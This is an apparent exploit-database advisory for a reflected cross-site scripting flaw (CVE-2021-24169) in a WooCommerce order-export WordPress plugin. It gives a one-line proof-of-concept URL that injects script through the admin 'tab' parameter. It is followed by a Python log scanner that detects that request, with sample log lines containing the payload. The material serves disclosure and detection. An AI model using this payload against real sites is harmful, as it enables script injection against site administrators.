WordPress Advanced Order Export For WooCommerce 3.1.7 Cross Site Scripting

  • # Exploit Title: WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS)
    # Date: 15/2/2021
    # Author: 0xB9
    # Software Link: https://wordpress.org/plugins/woo-order-export-lite/
    # Version: 3.1.7
    # Tested on: Windows 10
    # CVE: CVE-2021-24169
    
    1. Description:
    This plugin helps you to easily export WooCommerce order data. The tab parameter in the Admin Panel is vulnerable to XSS.
    
    2. Proof of Concept:
    wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(1)</script>
    
    
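A log check for the request shape in the proof of concept, as an added example that is not part of the original post or the plugin's code: it flags requests to the `wc-order-export` admin page whose decoded `tab` value is not slug-like. The slug character set (the one WordPress's `sanitize_key()` keeps), the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of an Apache/nginx "combined" log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')

# Assumption: legitimate tab values are slugs, i.e. the character set that
# WordPress's sanitize_key() keeps (lowercase letters, digits, dash, underscore).
SAFE_TAB_RE = re.compile(r"[a-z0-9_-]*")

# Constructed sample lines (not real traffic); "example-tab" is a placeholder.
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Feb/2021:10:00:01 +0000] "GET /wp-admin/admin.php'
    '?page=wc-order-export&tab=example-tab HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [15/Feb/2021:10:00:09 +0000] "GET /wp-admin/admin.php'
    '?page=wc-order-export&tab=%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E'
    ' HTTP/1.1" 200 5344 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [15/Feb/2021:10:01:30 +0000] "GET /wp-admin/admin.php'
    '?page=other-plugin&tab=%3Cb%3E HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]


def suspicious_tab(log_line):
    """Return the decoded tab value when the line is a request to the plugin's
    admin page carrying a non-slug tab parameter; otherwise return None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group("target"))
    if not url.path.endswith("/wp-admin/admin.php"):
        return None
    # parse_qs percent-decodes once, so a double-encoded value still contains
    # '%' after decoding and is flagged as well.
    params = parse_qs(url.query, keep_blank_values=True)
    if "wc-order-export" not in params.get("page", []):
        return None
    for tab in params.get("tab", []):
        if not SAFE_TAB_RE.fullmatch(tab):
            return tab
    return None


def scan(lines):
    """Return (line_number, decoded_tab) for every flagged line."""
    return [(n, tab) for n, line in enumerate(lines, 1)
            if (tab := suspicious_tab(line)) is not None]
```

Only requests to this plugin's page are considered, so markup in a `tab` parameter sent to other admin pages is out of scope for this check.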